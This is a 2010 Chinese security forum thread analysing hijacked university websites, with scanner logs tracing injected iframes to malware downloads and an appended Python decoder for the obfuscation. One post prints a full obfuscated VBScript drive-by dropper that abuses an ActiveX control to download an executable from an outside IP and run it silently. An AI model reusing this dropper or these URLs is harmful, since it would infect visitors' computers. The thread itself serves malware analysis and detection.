networkedition - 2010-7-23 12:56:00
The URLs all come from Rising's daily security bulletin; we analyze in detail the malicious URLs planted on them. Malicious URLs that are already dead are not analyzed.
Note: the malicious URLs analyzed below all contain real web-trojan download addresses; do not download and run them directly, or your system may be infected.
1. http://ciee.cau.edu.cn/ (Open China Agricultural University welcomes you!)
2. http://erm.bnu.edu.cn/ (Beijing Normal University)
3. http://ge.lzu.edu.cn/ (Welcome to Lanzhou University)
4. http://soft.psych.gov.cn/ (Nanjing University of Technology Mental Health Education Center)
5. http://www.law.sdu.edu.cn/ (Shandong University School of Law)
User system info: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
networkedition - 2010-7-23 12:57:00
Log is generated by FreShow.
[wide]http://ciee.cau.edu.cn/dqpy/index.asp
[frame]http://ciee.cau.edu.cn/dqpy/./xu_admin/list.htm
[object]http://202.205.89.194/8.exe
[script]http://ciee.cau.edu.cn/dqpy/count.asp
networkedition - 2010-7-23 12:57:00
关于:hxxp://erm.bnu.edu.cn/解密的日志(全体输出 - 14):
Level 0>http://erm.bnu.edu.cn/
Level 1>http://b%65i.Is%47re.%61t/b.js?google=07x231
Level 2>http://avn.2288.org/66/450ay.htm
Level 3>http://avn.2288.org/66/av.htm
Level 4>http://avn.2288.org/66/7.htm
Level 5>http://avn.2288.org/66/ieee.jpg
Level 5>http://avn.2288.org/66/iee.jpg
Level 6>http://avn.2288.org/o/tv.exe
Level 5>http://avn.2288.org/66/ie.jpg
Level 4>http://avn.2288.org/66/6.htm
Level 3>http://avn.2288.org/66/fff.swf ●
Level 3>http://avn.2288.org/66/iie.swf ●
Level 3>http://img.tongji.linezing.com/806392/tongji.gif
Level 3>http://js.tongji.linezing.com/806392/tongji.js
日志由 Redoce2.0第89次修正版于 2010-7-23 12:46:54 生成。
networkedition - 2010-7-23 12:57:00
Log is generated by FreShow.
[wide]http://ge.lzu.edu.cn/html/wz/2002128/news/1062298653324256.html
[script]http://js.users.51.la/3902985.js
[frame]http://www.anmo-tianjin.com/wow/wow6.htm
[object]http://www.zhajinhua.cc/xiazai/1.exe
networkedition - 2010-7-23 12:58:00
Log is generated by FreShow.
[wide]http://soft.psych.gov.cn/new/onlinezixun/list/013y.html
[frame]http://b12.17wanmei.com/tltl.html
[frame]http://www.katway.cn/css/js/tl/css.htm
[object]http://www.katway.cn/css/js/tl/Cute.htc
[object]http://www.tschk.com/Inc/new/tl.html
[object]http://yesoff.com/api/class/dll/tt.exe
[script]http://js.users.51.la/3993955.js
[script]http://s9.cnzz.com/stat.php?id=2046632&web_id=2046632
[script]http://js.users.51.la/3912534.js
networkedition - 2010-7-23 12:58:00
Log is generated by FreShow.
[wide]http://www.law.sdu.edu.cn/news/1e30b09dc36a4806.html
[script]http://js.users.51.la/3902985.js
[frame]http://www.anmo-tianjin.com/wow/wow27.htm
[object]http://www.zhajinhua.cc/xiazai/1.exe
辛达星郁 - 2010-7-23 14:41:00
Looks like a new encryption method; first time I've seen it.
The code to decrypt can be obtained directly from the trojan-planting address:
http://ciee.cau.edu.cn/dqpy/./xu_admin/list.htm
Decryption method: 1: remove the Document.Write; 2: pay attention to this code
h000t000t000pxxx:xxx/xxx/xxx2xxx0xxx2xxx.xxx2xxx0xxx5xxx.xxx8xxx9xxx.xxx1xxx9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"
It's easy to miss if you're not careful; remove the interference characters "0" and "X".
Final decryption: http://202.205.89.194/8.exe
jks_风 - 2010-7-23 15:32:00
Log is generated by FreShow.
[wide]http://ge.lzu.edu.cn/html/wz/2002128/news/1062298653324256.html
[script]http://js.users.51.la/3902985.js
[frame]http://www.anmo-tianjin.com/wow/wow6.htm
[object]http://www.zhajinhua.cc/xiazai/1.exe
jks_风 - 2010-7-23 15:39:00
Log is generated by FreShow.
[wide]http://soft.psych.gov.cn/new/onlinezixun/list/013y.html
[frame]http://b12.17wanmei.com/tltl.html
[frame]http://www.katway.cn/css/js/tl/css.htm
[object]http://www.katway.cn/css/js/tl/www.katway.cn/css/js/tl/Cute.htc
[object]http://www.tschk.com/Inc/new/tl.html
[object]http://yesoff.com/api/class/dll/tt.exe
[script]http://js.users.51.la/3993955.js
[script]http://s9.cnzz.com/stat.php?id=2046632&web_id=2046632
[script]http://js.users.51.la/3912534.js
jks_风 - 2010-7-23 15:52:00
Log is generated by FreShow.
[wide]http://www.law.sdu.edu.cn/news/1e30b09dc36a4806.html
[script]http://js.users.51.la/3902985.js
[frame]http://www.anmo-tianjin.com/wow/wow27.htm
[object]http://www.zhajinhua.cc/xiazai/1.exe
jks_风 - 2010-7-23 15:54:00
It's dead; couldn't see it.
小傻大呆 - 2010-7-23 19:16:00
<script language="VBScript">
on error resume next
pil1 = "Sxxxcxxxrxxxixxxpxxxtxxxixxxnxxxgxxx.xxxFxxxixxxlxxxexxxSxxxyxxxsxxxtxxxexxxmxxxOxxxbxxxjxxxexxxcxxxtxxx"
pil2 = "Sxxxhxxxexxxlxxxlxxx.xxxAxxxpxxxpxxxlxxxixxxcxxxaxxxtxxxixxxoxxxnxxx"
wj="wins.exe"
strl="Mrrrirrrcrrrrrrrorrrsrrrorrrfrrrtrrr.rrrXrrrMrrrLrrrHrrrTrrrTrrrPrrr"
strl4="orrrbrrrjrrrerrrcrrrtrrr"
strl5="Agggdgggogggdgggbggg.gggSgggtgggrgggegggagggmggg"
strl6="GgggEgggTggg"
strl7="c222l222a222s222s222i222d222"
pi8="c111l111s111i111d111:111B111D11191116111C111511151116111-11161115111A1113111-11111111111D1110111-111911181113111A111-11101110111C11101114111F111C11121119111E11131116111"
pi9 = "h000t000t000pxxx:xxx/xxx/xxx2xxx0xxx2xxx.xxx2xxx0xxx5xxx.xxx8xxx9xxx.xxx1xxx9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"
function chan(obt1)
chan=""
obt2 = len(obt1)
for i=1 to obt2 step 4
chan=chan+mid(obt1,i,1)
next
end function
pi1=chan(pil1)
pi2=chan(pil2)
str=chan(strl)
str4=chan(strl4)
str5=chan(strl5)
str6=chan(strl6)
str7=chan(strl7)
str8=chan(pi8)
dl=chan(pi9)
sub sub1(obt1,obt2)
df.setAttribute obt1,obt2
end sub
sub sub2(obt1,obt2,obt3,obt4,obt5,obt6)
obt1.type = obt3
obt2.Open obt4, obt5, obt6
obt2.Send
end sub
function fun1(obt1)
Set fun1 = document.createElement(obt1)
end function
function fun2(obt1)
set fun2 = df.createobject(obt1,"")
end function
sub fun3(obt1,obt2)
obt1.open
obt1.write obt2.responseBody
end sub
sub fun4(obt1,obt2,obt3)
obt1.savetofile obt2,obt3
end sub
function fun5(obt2,obt3)
set fun5 = obt2.createobject(obt3,"")
end function
Set df = fun1(str4)
sub1 str7,str8
Set x = fun2(Str)
set S = fun2(Str5)
sub2 S,x,1,str6,dl,false
call fun3(S,x)
fun4 S,fun2(pi1).BuildPath(fun2(pi1).GetSpecialFolder(2),wj),2
S.close
fun5(df,pi2).ShellExecute fun2(pi1).BuildPath(fun2(pi1).GetSpecialFolder(2),wj),"","","open",0
rem edit by labczm in cau
</script>
This is with the Document.Write removed.
Looking at 辛达星郁's sentence, which line of code in here is asking me to strip out the junk in the middle?
Could a teacher give some pointers... and could 辛达星郁 also explain?
Thanks.
辛达星郁 - 2010-7-24 21:16:00
Please look at this code carefully!!
"h000t000t000pxxx:xxx/xxx/xxx2xxx0xxx2xxx.xxx2xxx0xxx5xxx.xxx8xxx9xxx.xxx1xxx9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"
Try removing the clutter in it: "0" and "x"
Extract a few first:
= "http:202.205.89.1x9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx"
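A decoder for the stride-4 string obfuscation used by the VBScript posted above, added here as an example and not code from the thread: it ports the script's own chan() routine to Python, contrasts it with the "delete the 0 and x characters" approach from the replies, and pulls URL, classid and COM ProgID indicators out of the decoded strings for blocklisting and detection. The obfuscated literals are copied verbatim from the posted script; the function names are my own.

```python
import re

# Obfuscated literals copied verbatim from the posted VBScript (pil1, strl5, pi8, pi9).
# The filler differs per string (xxx, 000, 111, rrr, ggg, 222) but every real character
# is followed by exactly three junk characters, so the stride is always 4.
SAMPLE = {
    "pil1": "Sxxxcxxxrxxxixxxpxxxtxxxixxxnxxxgxxx.xxxFxxxixxxlxxxexxxSxxxyxxxsxxxtxxxexxxmxxxOxxxbxxxjxxxexxxcxxxtxxx",
    "strl5": "Agggdgggogggdgggbggg.gggSgggtgggrgggegggagggmggg",
    "pi8": "c111l111s111i111d111:111B111D11191116111C111511151116111-11161115111A1113111-11111111111D1110111-111911181113111A111-11101110111C11101114111F111C11121119111E11131116111",
    "pi9": "h000t000t000pxxx:xxx/xxx/xxx2xxx0xxx2xxx.xxx2xxx0xxx5xxx.xxx8xxx9xxx.xxx1xxx9xxx4xxx/xxx8xxx.xxxexxxxxxxexxx",
}


def chan(obfuscated: str) -> str:
    """Port of the script's chan(): VBScript 'for i=1 to len step 4' keeps chars 1,5,9,..."""
    return obfuscated[::4]


def strip_filler(obfuscated: str, filler: str = "0xX") -> str:
    """The 'remove the interference characters 0 and x' method suggested in the thread.

    It is fragile: a '0' inside 202.205 and the 'x' inside 'exe' are real data,
    so blind deletion corrupts the IP address and the file extension.
    """
    return "".join(c for c in obfuscated if c not in filler)


def decode_all(literals: dict) -> dict:
    """Decode every obfuscated literal with the stride method the dropper itself uses."""
    return {name: chan(value) for name, value in literals.items()}


def extract_iocs(decoded: dict) -> dict:
    """Sort decoded strings into indicator classes an analyst would feed to detections.

    pi8 decodes to 'clsid:BD96C556-...', the classid of the RDS.DataSpace ActiveX
    control that the page instantiates via the <object> tag's classid attribute.
    """
    values = list(decoded.values())
    return {
        "urls": [v for v in values if re.match(r"^https?://", v)],
        "clsids": [v for v in values if re.match(r"^clsid:[0-9A-Fa-f-]{36}$", v)],
        "progids": [v for v in values if re.match(r"^[A-Za-z]+\.[A-Za-z]+$", v)],
    }


if __name__ == "__main__":
    for name, plain in decode_all(SAMPLE).items():
        print(f"{name:6} -> {plain}")
    print("naive strip of pi9:", strip_filler(SAMPLE["pi9"]))
    print(extract_iocs(decode_all(SAMPLE)))
```

Running the naive strip on pi9 yields "http://22.25.89.194/8.ee", which is why the stride decoder, not character deletion, is the reliable way to recover the download URL from this family.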